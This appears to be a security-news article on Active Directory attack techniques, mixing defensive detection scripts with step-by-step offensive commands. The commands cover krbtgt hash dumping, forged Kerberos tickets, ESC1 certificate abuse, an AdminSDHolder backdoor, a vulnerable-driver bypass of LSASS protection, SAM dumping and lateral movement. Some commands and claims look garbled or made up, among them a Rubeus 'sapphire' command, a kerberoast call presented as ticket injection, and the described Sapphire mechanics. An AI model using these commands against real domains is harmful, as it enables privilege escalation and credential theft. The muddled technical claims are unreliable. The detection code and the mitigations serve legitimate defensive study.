
Introduction:
Active Directory (AD) remains the crown jewel of enterprise authentication, yet its complexity breeds critical vulnerabilities like Kerberos delegation misconfigurations and AD Certificate Services (ADCS) flaws. This article dives deep into offensive AD tradecraft—from initial exploitation to advanced persistence—based on the latest training curriculum from Ignite Technologies, featuring newly added DACL abuse, ADCS attacks, and the coveted Sapphire & Diamond Ticket techniques.
Learning Objectives:
- Execute Kerberos-based attacks including Golden, Silver, Diamond, and Sapphire Tickets to forge unauthorized access.
- Perform advanced credential dumping and lateral movement using native Windows tools and Impacket.
- Abuse ACLs and ADCS misconfigurations to escalate privileges and maintain persistence in forest environments.
You Should Know:
1. Sapphire & Diamond Ticket Attacks – Bypassing Modern Kerberos Protections
Step‑by‑step guide explaining what this does and how to use it:
What are Diamond and Sapphire Tickets?
- Diamond Ticket: Forges a TGT by re‑encrypting a valid PAC with the krbtgt hash, avoiding detection by security solutions that monitor for unusual ticket flags (e.g., PA DATA values).
- Sapphire Ticket: A variant that manipulates timestamps and cname fields to evade SIEM correlation while maintaining full TGT functionality.
Linux (with Impacket & Rubeus via wine/CrossOver):
Extract the krbtgt hash from a DC dump (secretsdump):
impacket-secretsdump -just-dc-ntlm 'domain.com/administrator:password@dc-ip'
Example hash line: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:xxxxx:::
Generate a Diamond Ticket with Rubeus (run on Windows or via wine):
Rubeus.exe diamond /krbtgt:<hash> /user:Administrator /domain:domain.com /dc:dc.domain.com /ticketuser:TargetUser /outfile:diamond.kirbi
Convert to ccache for Impacket:
python3 kirbi2ccache.py diamond.kirbi
export KRB5CCNAME=diamond.ccache
impacket-wmiexec -k -no-pass target.domain.com
Windows (Native + Rubeus):
Load Mimikatz to get the krbtgt hash:
mimikatz.exe "lsadump::lsa /inject /name:krbtgt" "exit"
Create a Sapphire Ticket (Rubeus):
Rubeus.exe sapphire /krbtgt:<NT_hash> /user:Administrator /domain:megacorp.local /dc:dc1.megacorp.local /starttime:<offset> /endtime:<offset+1h> /outfile:sapphire.kirbi
Inject the ticket:
Rubeus.exe kerberoast /spn:HTTP/web.megacorp.local /ticket:sapphire.kirbi
Mitigation: Enforce Kerberos Armoring (FAST), rotate the krbtgt password regularly (reset it twice, allowing replication to complete between resets, so tickets forged with the old key stop validating), and monitor Event ID 4769 for anomalous TGT requests.
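The monitoring advice above can be turned into a concrete correlation. The following is an added example (not code from the article or from Ignite's curriculum) that goes slightly beyond Diamond and Sapphire tickets: any TGT minted offline with the krbtgt key, Golden tickets included, is never issued by a DC, so no Event ID 4768 exists for it and the first trace is a 4769 service-ticket request with no preceding 4768 for the same user and source address. The events, field names and the 10-hour TGT lifetime are constructed assumptions for the sample.

```python
"""Correlate Kerberos TGT requests (Event ID 4768) with service-ticket
requests (Event ID 4769) to surface service tickets no DC issued a TGT for.

Added example; not from the article.  A TGT forged with the krbtgt key is
created offline, so the DC logs no 4768 for it.  RC4 (etype 0x17) on an
account that holds AES keys is an independent second signal.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry); keys mirror the
# Security-log XML fields TargetUserName / IpAddress / TicketEncryptionType.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T08:00:00", "id": 4768, "user": "alice",
     "ip": "10.0.0.21", "etype": "0x12", "service": "krbtgt"},
    {"time": "2024-05-01T08:00:05", "id": 4769, "user": "alice",
     "ip": "10.0.0.21", "etype": "0x12", "service": "cifs/fs01"},
    # No 4768 exists for 'administrator' from 10.0.0.99 anywhere in the log.
    {"time": "2024-05-01T09:15:00", "id": 4769, "user": "administrator",
     "ip": "10.0.0.99", "etype": "0x17", "service": "cifs/dc01"},
    {"time": "2024-05-01T09:15:02", "id": 4769, "user": "administrator",
     "ip": "10.0.0.99", "etype": "0x17", "service": "host/dc01"},
]

MAX_TGT_LIFETIME = timedelta(hours=10)  # default "Maximum lifetime for user ticket"
AES_ETYPES = {"0x11", "0x12"}           # AES128-CTS / AES256-CTS; 0x17 is RC4-HMAC


def _t(stamp):
    return datetime.fromisoformat(stamp)


def find_suspicious_service_tickets(events, tgt_lifetime=MAX_TGT_LIFETIME):
    """Return (user, ip, service, reason) for every 4769 that lacks a 4768
    from the same user+source within tgt_lifetime, or that uses a non-AES
    encryption type."""
    tgt_times = defaultdict(list)
    for ev in events:
        if ev["id"] == 4768:
            tgt_times[(ev["user"].lower(), ev["ip"])].append(_t(ev["time"]))

    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] != 4769:
            continue
        now = _t(ev["time"])
        key = (ev["user"].lower(), ev["ip"])
        has_tgt = any(timedelta(0) <= now - issued <= tgt_lifetime
                      for issued in tgt_times[key])
        reasons = []
        if not has_tgt:
            reasons.append("no 4768 from this user/source within TGT lifetime")
        if ev["etype"] not in AES_ETYPES:
            reasons.append(f"non-AES ticket encryption type {ev['etype']}")
        if reasons:
            findings.append((ev["user"], ev["ip"], ev["service"], "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for user, ip, svc, why in find_suspicious_service_tickets(SAMPLE_EVENTS):
        print(f"[!] {user} from {ip} -> {svc}: {why}")
```

Two caveats when running this against real logs: 4768 is written only by the DC that issued the TGT, so the input must be the merged Security logs of every DC, and a legitimate TGT issued before the start of the collection window will also appear orphaned, so size the window to at least one TGT lifetime. The check complements the krbtgt rotation above, since a double reset invalidates tickets forged with the old key regardless of whether they were ever detected.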
2. ADCS Abuse – Escalating to DA via Certificate Templates
Step‑by‑step guide explaining what this does and how to use it:
Overview: Misconfigured certificate templates (e.g., ESC1 – Client Authentication + CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) allow attackers to request a certificate as any user, including Domain Admin.
Enumeration with Certipy (Linux):
certipy find -u '[email protected]' -p 'pass' -dc-ip 10.0.0.1 -vulnerable
Identify the ESC1-enabled template (e.g., 'WebServer'), then request a certificate for Domain Admin:
certipy req -u '[email protected]' -p 'pass' -target ca.domain.com -template WebServer -upn '[email protected]'
Windows using Certify:
Certify.exe find /vulnerable
Certify.exe request /ca:ca.domain.com\CA /template:ESC1-Template /altname:administrator
Convert certificate to hash (TGT):
certipy auth -pfx administrator.pfx -domain domain.com -dc-ip 10.0.0.1
Defense: Disable `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` on templates, require manager approval, enforce SID extension.
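The defense above amounts to an audit of a few template attributes. The following is an added example, not code from the article, Certipy or Certify: it evaluates raw template attributes (named as in the AD schema) that a defender can export from the Certificate Templates container and reports every template meeting all of the ESC1 conditions at once. The template records are constructed, and the enrollment rights are pre-resolved into principal names for the sample; in a real export they would be derived from each template's security descriptor.

```python
"""Flag certificate templates matching the ESC1 pattern: enrollee supplies
the subject, an authentication EKU, no manager approval or authorized
signature, and enrollment open to low-privileged principals.

Added example; not from the article.  Sample templates are constructed.
"""
# msPKI-Certificate-Name-Flag bit: the requester supplies the subject/SAN.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit: every request is pended for CA manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKUs that make the issued certificate usable for AD logon.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
# Enrollment granted to any of these is effectively "anyone in the domain".
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers",
                       "Authenticated Users", "Everyone"}

SAMPLE_TEMPLATES = [  # constructed sample data
    {"name": "WebServer-Custom",
     "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
     "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1", "1.3.6.1.5.5.7.3.2"],
     "enroll": ["Domain Users", "Domain Admins"]},
    {"name": "User",  # subject is built from AD, so not ESC1
     "msPKI-Certificate-Name-Flag": 0x0, "msPKI-Enrollment-Flag": 0x0,
     "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "enroll": ["Domain Users"]},
    {"name": "AdminApproved",  # manager approval blocks the abuse
     "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x2,
     "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "enroll": ["Domain Users"]},
    {"name": "TierZeroOnly",  # only admins can enroll
     "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
     "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": [],  # empty EKU list = any purpose
     "enroll": ["Domain Admins"]},
]


def esc1_findings(tpl, low_priv=LOW_PRIV_PRINCIPALS):
    """Return the conditions that together make `tpl` ESC1-vulnerable, or an
    empty list as soon as any one of them is absent."""
    conditions = []
    if tpl["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        conditions.append("CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT set")
    else:
        return []
    ekus = set(tpl["pKIExtendedKeyUsage"])
    if not ekus or ekus & AUTH_EKUS:
        conditions.append("authentication EKU (or no EKU restriction)")
    else:
        return []
    if tpl["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        return []
    conditions.append("no manager approval")
    if tpl["msPKI-RA-Signature"] > 0:
        return []
    conditions.append("no authorized signature required")
    exposed = set(tpl["enroll"]) & low_priv
    if not exposed:
        return []
    conditions.append(f"enrollable by {', '.join(sorted(exposed))}")
    return conditions


def audit_templates(templates):
    """Map template name -> ESC1 conditions for every vulnerable template."""
    return {t["name"]: c for t in templates if (c := esc1_findings(t))}


if __name__ == "__main__":
    for name, why in audit_templates(SAMPLE_TEMPLATES).items():
        print(f"[ESC1] {name}: " + "; ".join(why))
```

Each of the four fixes listed above removes one condition from the chain: clearing the name flag, requiring manager approval (sets the pend bit), requiring an authorized signature, or restricting enrollment all return an empty finding, which is why the audit stops at the first missing condition rather than scoring them independently.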
3. DACL Abuse – Backdooring AdminSDHolder
Step‑by‑step guide:
Concept: Granting a low-privileged user `GenericWrite` on AdminSDHolder replicates permissions to all protected groups (Domain Admins, etc.) within ~60 min.
PowerView (Windows):
Find modifiable ACLs
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {$_.IdentityReferenceName -eq "lowUser"}
Add FullControl to lowUser on AdminSDHolder
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=com' -PrincipalIdentity lowUser -Rights All
BloodHound (Custom Cypher):
MATCH (u:User {name: "[email protected]"})-[r:GenericWrite|WriteOwner|AllExtendedRights]->(g:Group {name: "DOMAIN [email protected]"}) RETURN u,g
Detection: Monitor Event 5136 (Directory Service Changes) on AdminSDHolder and periodically export its ACL with `Get-ADObject -Filter * -SearchBase "CN=AdminSDHolder,CN=System,DC=domain,DC=com" -Properties ntSecurityDescriptor` so that unexpected ACEs stand out.
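Reviewing the exported descriptor by eye does not scale, so the following added example (not code from the article, PowerView or BloodHound) parses the DACL of an SDDL string, such as the `.Sddl` of the security descriptor exported above, and lists every allow ACE that grants write-class rights to a trustee outside an expected set. The SDDL string is constructed, and the trusted-principal set is an assumption to adjust per domain; the real AdminSDHolder DACL also carries object-specific (`OA`) property writes for built-in groups, which this check will surface until they are added to the trusted set.

```python
"""Parse the DACL of an SDDL descriptor and report write-class ACEs held by
unexpected trustees, the check a defender runs against AdminSDHolder.

Added example; not from the article.  SDDL sample and trusted set are
constructed assumptions.
"""
import re

# Active Directory access-mask bits and their SDDL two-letter tokens.
RIGHT_BITS = {
    "CC": 0x00000001, "DC": 0x00000002, "LC": 0x00000004, "SW": 0x00000008,
    "RP": 0x00000010, "WP": 0x00000020, "DT": 0x00000040, "LO": 0x00000080,
    "CR": 0x00000100, "SD": 0x00010000, "RC": 0x00020000, "WD": 0x00040000,
    "WO": 0x00080000, "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000,
    "GR": 0x80000000,
}
# Rights that let the holder change the object or its security descriptor.
WRITE_CLASS = {"GA", "GW", "WD", "WO", "WP", "CC", "DC", "SD", "CR"}
# Assumption: Domain Admins, Enterprise Admins, Builtin Administrators, SYSTEM.
TRUSTED = {"DA", "EA", "BA", "SY"}

ACE_RE = re.compile(r"\(([^)]*)\)")

# Constructed sample: two default-looking ACEs, a read-only ACE for
# Authenticated Users, and two injected ACEs for ordinary domain SIDs.
SAMPLE_SDDL = (
    "O:DAG:DAD:PAI"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;SY)"
    "(A;;RPLCLORC;;;AU)"
    "(A;;GWWD;;;S-1-5-21-1111111111-2222222222-3333333333-1105)"
    "(A;;0x40000;;;S-1-5-21-1111111111-2222222222-3333333333-1106)"
)


def parse_rights(field):
    """Decode the rights field, given either as a hex mask or token string."""
    if field.lower().startswith("0x"):
        mask = int(field, 16)
        return {tok for tok, bit in RIGHT_BITS.items() if mask & bit}
    return {field[i:i + 2] for i in range(0, len(field), 2)}


def parse_dacl(sddl):
    """Return the DACL ACEs as dicts (type, flags, rights, object, trustee)."""
    start = sddl.find("D:")
    if start < 0:
        return []
    end = sddl.find("S:", start + 2)            # the SACL, if any, follows
    dacl = sddl[start + 2:end if end > 0 else len(sddl)]
    aces = []
    for m in ACE_RE.finditer(dacl):
        parts = m.group(1).split(";")
        if len(parts) < 6:
            continue
        ace_type, flags, rights, obj_guid, _inherit_guid, trustee = parts[:6]
        aces.append({"type": ace_type, "flags": flags,
                     "rights": parse_rights(rights),
                     "object": obj_guid, "trustee": trustee})
    return aces


def suspicious_write_aces(sddl, trusted=TRUSTED):
    """List (trustee, sorted rights) for allow ACEs that grant write-class
    rights to a trustee outside `trusted`."""
    hits = []
    for ace in parse_dacl(sddl):
        if ace["type"] not in ("A", "OA"):
            continue                            # deny ACEs are not abuse paths
        dangerous = ace["rights"] & WRITE_CLASS
        if dangerous and ace["trustee"] not in trusted:
            hits.append((ace["trustee"], sorted(dangerous)))
    return hits


if __name__ == "__main__":
    for trustee, rights in suspicious_write_aces(SAMPLE_SDDL):
        print(f"[!] {trustee} holds {','.join(rights)}")
```

Because SDProp copies AdminSDHolder's ACL to the protected groups roughly hourly, a finding on the template object itself is the earliest point at which the change can be reverted before it reaches Domain Admins.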
4. Credential Dumping – Advanced Persistent Memory Extraction
Step‑by‑step guide:
Bypassing LSA Protection (PPL) with Mimikatz:
Install a vulnerable driver (e.g., RTCore64.sys):
sc create RTCore64 type= kernel binPath= C:\path\RTCore64.sys
sc start RTCore64
Use Mimikatz with the driver:
mimikatz "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "exit"
Linux – Remote Dumping via WMI and Shadow Copies:
impacket-smbexec domain.com/user:pass@dc-ip 'reg save HKLM\SAM c:\sam.save & reg save HKLM\SYSTEM c:\system.save'
impacket-smbclient domain.com/user:pass@dc-ip -c 'get c:\sam.save; get c:\system.save'
secretsdump -sam sam.save -system system.save LOCAL
Mitigation: Enable LSA Protection (RunAsPPL), which runs LSASS as a Protected Process Light, and enforce Windows Defender Credential Guard.
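RunAsPPL only holds if nobody can load a driver that strips the protection, so the detection worth pairing with it is the driver install itself. The following added example (not code from the article) flags kernel-driver service installs (Event ID 4697) and Sysmon driver-load events (Event ID 6) that fit that pattern: a driver image outside the normal driver directories, a file name or hash on a vulnerable-driver blocklist, or a signature status other than Valid. The events are constructed; RTCore64.sys is the name the article mentions, while the hash entry is a placeholder and the blocklist should in practice be fed from Microsoft's vulnerable driver blocklist or a comparable source.

```python
"""Flag 4697 kernel-driver installs and Sysmon 6 driver loads that look like
a bring-your-own-vulnerable-driver load.  Added example; not from the
article.  Events, directories and blocklist entries are constructed.
"""
import ntpath

KERNEL_DRIVER_TYPES = 0x1 | 0x2   # SERVICE_KERNEL_DRIVER | SERVICE_FILE_SYSTEM_DRIVER
ALLOWED_DRIVER_DIRS = (r"c:\windows\system32\drivers",
                       r"c:\windows\system32\driverstore")
BLOCKLISTED_NAMES = {"rtcore64.sys"}  # name from the article; extend from a real blocklist
BLOCKLISTED_HASHES = {"SHA256=PLACEHOLDER_HASH_OF_KNOWN_VULNERABLE_DRIVER"}  # placeholder

SAMPLE_EVENTS = [  # constructed sample events
    {"id": 4697, "ServiceName": "RTCore64", "ServiceType": "0x1",
     "ServiceFileName": r"C:\Users\bob\Downloads\RTCore64.sys"},
    {"id": 4697, "ServiceName": "Spooler", "ServiceType": "0x10",
     "ServiceFileName": r"C:\Windows\System32\spoolsv.exe"},
    {"id": 4697, "ServiceName": "vendorfilt", "ServiceType": "0x1",
     "ServiceFileName": r"C:\Windows\System32\drivers\vendorfilt.sys"},
    {"id": 6, "ImageLoaded": r"C:\Windows\Temp\x.sys", "Signed": "true",
     "Signature": "Some Vendor", "SignatureStatus": "Expired",
     "Hashes": "SHA256=PLACEHOLDER_HASH_OF_KNOWN_VULNERABLE_DRIVER"},
    {"id": 6, "ImageLoaded": r"C:\Windows\System32\drivers\vendorfilt.sys",
     "Signed": "true", "Signature": "Microsoft Windows",
     "SignatureStatus": "Valid", "Hashes": "SHA256=0000000000000000"},
]


def outside_driver_dirs(path):
    """True when the driver image lives outside the normal driver directories."""
    p = ntpath.normpath(path).lower()
    return not any(p.startswith(d + "\\") for d in ALLOWED_DRIVER_DIRS)


def check_event(ev):
    """Return the reasons an event looks like a BYOVD load (empty if none)."""
    reasons = []
    if ev["id"] == 4697:
        if (int(ev["ServiceType"], 16) & KERNEL_DRIVER_TYPES) == 0:
            return []                       # user-mode service: out of scope here
        path = ev["ServiceFileName"]
    elif ev["id"] == 6:
        path = ev["ImageLoaded"]
        if ev.get("SignatureStatus") != "Valid":
            reasons.append(f"signature status {ev.get('SignatureStatus')}")
        if set(ev.get("Hashes", "").split(",")) & BLOCKLISTED_HASHES:
            reasons.append("hash is on the vulnerable-driver blocklist")
    else:
        return []
    name = ntpath.basename(path).lower()
    if name in BLOCKLISTED_NAMES:
        reasons.append(f"{name} is on the vulnerable-driver blocklist")
    if outside_driver_dirs(path):
        reasons.append(f"driver image {path} is outside the driver directories")
    return reasons


def scan(events):
    """Return (image path, reasons) for every event with at least one reason."""
    hits = []
    for ev in events:
        reasons = check_event(ev)
        if reasons:
            hits.append((ev.get("ServiceFileName") or ev.get("ImageLoaded"), reasons))
    return hits


if __name__ == "__main__":
    for path, reasons in scan(SAMPLE_EVENTS):
        print(f"[!] {path}: " + "; ".join(reasons))
```

A valid signature alone is not a clean bill of health, which is why the blocklist check runs even for signed images: the drivers abused for this technique are signed, and the defect is in what the driver exposes, not in its signature.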
5. Lateral Movement – WinRM, PSRemoting, and WMI Over Kerberos
Step‑by‑step guide:
Using Evil-WinRM (Linux) with ticket:
Convert kirbi to ccache and set KRB5CCNAME:
python3 kirbi2ccache.py admin_ticket.kirbi
export KRB5CCNAME=admin_ticket.ccache
evil-winrm -i target.domain.com -r domain.com
Windows native – PowerShell Remoting with alternate credentials:
$secPass = ConvertTo-SecureString 'password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('domain\admin', $secPass)
Enter-PSSession -ComputerName CORP-SRV01 -Credential $cred -Authentication Kerberos
WMI for stealth:
impacket-wmiexec -k -no-pass [email protected] "whoami /all"
Detection: Enable PowerShell logging (Event 4104), monitor 4648 for explicit logons, and restrict WinRM to jump hosts only.
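The 4648 advice above becomes actionable once "restrict WinRM to jump hosts" is expressed as a rule the events can be scored against. The following added example (not code from the article) does two things with explicit-credential logon events: it flags any remote logon with alternate credentials whose source computer is not an approved jump host, and it flags an account that fans out to several distinct targets inside a short window, the shape of a scripted Enter-PSSession or wmiexec loop. The events, the jump-host list and the thresholds are constructed assumptions; field names follow the 4648 XML (SubjectUserName, TargetUserName, TargetServerName) plus the Computer the event was logged on.

```python
"""Score Event ID 4648 (logon with explicit credentials) records for
lateral-movement patterns.  Added example; not from the article.  Sample
events, jump-host list and thresholds are constructed assumptions.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

JUMP_HOSTS = {"JUMP01", "JUMP02"}      # assumption: the only approved remoting sources
FANOUT_THRESHOLD = 3                   # distinct remote targets per account...
FANOUT_WINDOW = timedelta(minutes=10)  # ...inside this window triggers an alert

# Constructed 4648 samples: (TimeCreated, Computer, SubjectUserName,
# TargetUserName, TargetServerName).
SAMPLE_EVENTS = [
    ("2024-05-01T10:00:00", "JUMP01", "alice", "admin", "CORP-SRV01"),
    ("2024-05-01T10:01:00", "WS-0042", "bob", "admin", "CORP-SRV01"),
    ("2024-05-01T10:02:00", "WS-0042", "bob", "admin", "CORP-SRV02"),
    ("2024-05-01T10:03:00", "WS-0042", "bob", "admin", "CORP-SRV03"),
    ("2024-05-01T10:04:00", "WS-0042", "bob", "admin", "localhost"),
]


def analyze_explicit_logons(events, jump_hosts=JUMP_HOSTS,
                            threshold=FANOUT_THRESHOLD, window=FANOUT_WINDOW):
    """Return (computer, subject, reason) alerts: one per remote explicit
    logon from a non-jump host, plus one when an account first reaches
    `threshold` distinct targets within `window`."""
    alerts = []
    recent = defaultdict(deque)        # (computer, subject) -> deque[(time, target)]
    for stamp, computer, subject, target_user, server in sorted(events):
        # 4648 also fires for local runas; those have no lateral component.
        if server.lower() in ("localhost", computer.lower()):
            continue
        now = datetime.fromisoformat(stamp)
        if computer.upper() not in jump_hosts:
            alerts.append((computer, subject,
                           f"explicit logon as {target_user} to {server} from non-jump host"))
        q = recent[(computer.upper(), subject.lower())]
        q.append((now, server.upper()))
        while q and now - q[0][0] > window:
            q.popleft()                # slide the window forward
        if len({s for _, s in q}) == threshold:
            alerts.append((computer, subject,
                           f"{threshold} distinct targets within {window}"))
    return alerts


if __name__ == "__main__":
    for computer, subject, why in analyze_explicit_logons(SAMPLE_EVENTS):
        print(f"[!] {subject}@{computer}: {why}")
```

The fan-out rule fires once, when the distinct-target count first equals the threshold, so a long sweep produces one alert rather than one per host; the per-event jump-host rule is what gives the full target list for triage.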
What Undercode Say:
- Key Takeaway 1: Modern AD security demands shifting from traditional signature-based detection to behavior analytics; Diamond/Sapphire tickets leave anomalies in ticket option flags that can be caught via custom Sysmon rules.
- Key Takeaway 2: ADCS misconfigurations (ESC1–ESC8) are now the fastest path to Domain Admin – audit every certificate template with Certipy or PSPKIAudit.
Analysis: The training curriculum from Ignite Technologies underscores a critical industry pivot: attackers no longer rely on eternal exploits but abuse legitimate protocol features (Kerberos, certificates, ACLs). The addition of “Sapphire” tickets reveals an evolution in evasion – manipulating timestamp jitter and cname fields to bypass even advanced EDRs. Defenders must adopt a zero‑trust posture: regular krbtgt rotation, SID filtering for trust boundaries, and continuous monitoring of ADCS enrollment logs. For blue teams, understanding these attacks is the only way to build effective deception – like creating honeytokens in ACLs or fake certificate templates to catch low‑noise intrusions.
Prediction:
Within 18 months, Sapphire‑style ticket forging will be weaponized by ransomware gangs to accelerate lateral movement from days to minutes, forcing Microsoft to introduce mandatory FAST armoring by default. ADCS will emerge as the next “PrintNightmare” – pushing organizations to implement certificate auto‑enrollment with strict issuance policies. Offensive training like this will become mandatory for SOC analysts, not just pentesters, as tomorrow’s attacks will blend Kerberos forgery with cloud‑synchronized identities (Entra ID). Prepare to see “Hybrid Ticket” attacks that bridge on‑prem AD and Azure AD Kerberos trust.
Reported By: Active Directory – Hackers Feeds